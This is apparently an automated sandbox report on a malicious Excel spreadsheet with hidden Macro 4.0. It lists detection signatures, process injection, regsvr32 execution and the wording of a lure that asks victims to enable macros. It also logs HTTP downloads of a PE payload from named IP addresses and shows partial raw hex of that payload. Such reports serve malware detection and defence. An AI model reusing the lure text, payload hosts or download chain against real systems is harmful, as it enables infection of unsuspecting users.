Windows Analysis Report Compensation-1730406737-09272021.xls

Overview

General Information

Sample Name: Compensation-1730406737-09272021.xls
Analysis ID: 491509
MD5: b4b3a2223765ac84c9b1b05dbf7c6503
SHA1: 57bc35cb0c7a9ac6e7fcb5dea5c211fe5eda5fe0
SHA256: 3982ae3e61a6ba86d61bd8f017f6238cc9afeb08b785010d686716e8415b6a36
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
PE file has nameless sections
Sigma detected: Regsvr32 Command Line Without DLL
Machine Learning detection for dropped file
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[3].dat Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[1].dat Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[2].dat Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: amstream.pdb source: explorer.exe, 00000005.00000003.422309790.00000000027B1000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000AEB4 FindFirstFileW,FindNextFileW, 4_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0008AEB4 FindFirstFileW,FindNextFileW, 5_2_0008AEB4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_1000AEB4 FindFirstFileW,FindNextFileW, 8_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_0008AEB4 FindFirstFileW,FindNextFileW, 10_2_0008AEB4

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: 44466.7022844907[1].dat.0.dr Jump to dropped file
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 190.14.37.178:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 190.14.37.178:80

Networking:

barindex
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 14:51:09 GMTContent-Type: application/octet-streamContent-Length: 387072Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.7022844907.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 14:51:11 GMTContent-Type: application/octet-streamContent-Length: 387072Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.7022844907.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 14:51:12 GMTContent-Type: application/octet-streamContent-Length: 387072Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.7022844907.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /44466.7022844907.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.178Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44466.7022844907.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.183.96.67Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44466.7022844907.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.250.148.213Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: regsvr32.exe, 00000004.00000002.421225157.0000000001FC0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.705650290.00000000023C0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.431427625.0000000002200000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.422807773.0000000001D20000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.420832394.0000000001BC0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.433067223.0000000001CC0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.430171202.0000000000950000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000004.00000002.421225157.0000000001FC0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.705650290.00000000023C0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.431427625.0000000002200000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000002.433161953.0000000002190000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[1].dat Jump to behavior
Source: global traffic HTTP traffic detected: GET /44466.7022844907.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.178Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44466.7022844907.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.183.96.67Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44466.7022844907.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.250.148.213Connection: Keep-Alive

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing" in the yellow bar 19 above. 20 example of notification 22 ( 0 pRoTEcTmwARNNG This
Source: Screenshot number: 4 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the 26 docume
Source: Screenshot number: 4 Screenshot OCR: Enable Macros ) 30 31 32 :: Why I can not open this document? 35 36 - You are using iOS or And
Source: Document image extraction number: 0 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
Source: Document image extraction number: 0 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 0 Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Source: Document image extraction number: 1 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcTmwARNNG Thisfileorigi
Source: Document image extraction number: 1 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 1 Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[3].dat Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd1.red
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[1].dat Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd.red
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd2.red
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[2].dat Jump to dropped file
PE file has nameless sections
Source: 44466.7022844907[1].dat.0.dr Static PE information: section name:
Source: 44466.7022844907[1].dat.0.dr Static PE information: section name:
Source: 44466.7022844907[1].dat.0.dr Static PE information: section name:
Source: Drezd.red.0.dr Static PE information: section name:
Source: Drezd.red.0.dr Static PE information: section name:
Source: Drezd.red.0.dr Static PE information: section name:
Source: 44466.7022844907[2].dat.0.dr Static PE information: section name:
Source: 44466.7022844907[2].dat.0.dr Static PE information: section name:
Source: 44466.7022844907[2].dat.0.dr Static PE information: section name:
Source: Drezd1.red.0.dr Static PE information: section name:
Source: Drezd1.red.0.dr Static PE information: section name:
Source: Drezd1.red.0.dr Static PE information: section name:
Source: 44466.7022844907[3].dat.0.dr Static PE information: section name:
Source: 44466.7022844907[3].dat.0.dr Static PE information: section name:
Source: 44466.7022844907[3].dat.0.dr Static PE information: section name:
Source: Drezd2.red.0.dr Static PE information: section name:
Source: Drezd2.red.0.dr Static PE information: section name:
Source: Drezd2.red.0.dr Static PE information: section name:
Source: Drezd.red.5.dr Static PE information: section name:
Source: Drezd.red.5.dr Static PE information: section name:
Source: Drezd.red.5.dr Static PE information: section name:
Source: Drezd1.red.10.dr Static PE information: section name:
Source: Drezd1.red.10.dr Static PE information: section name:
Source: Drezd1.red.10.dr Static PE information: section name:
Source: Drezd.red.15.dr Static PE information: section name:
Source: Drezd.red.15.dr Static PE information: section name:
Source: Drezd.red.15.dr Static PE information: section name:
Source: Drezd2.red.17.dr Static PE information: section name:
Source: Drezd2.red.17.dr Static PE information: section name:
Source: Drezd2.red.17.dr Static PE information: section name:
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02833726 4_2_02833726
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831424 4_2_02831424
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0283242A 4_2_0283242A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02832C41 4_2_02832C41
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831000 4_2_02831000
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831D89 4_2_02831D89
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02834495 4_2_02834495
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0283B114 4_2_0283B114
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831827 4_2_02831827
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_028334DA 4_2_028334DA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831C5D 4_2_02831C5D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02834162 4_2_02834162
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_028332EB 4_2_028332EB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02833073 4_2_02833073
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_10016EB0 4_2_10016EB0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_10012346 4_2_10012346
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_10011758 4_2_10011758
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_10014FC0 4_2_10014FC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00096EB0 5_2_00096EB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00092346 5_2_00092346
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00091758 5_2_00091758
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00094FC0 5_2_00094FC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D82C41 8_2_00D82C41
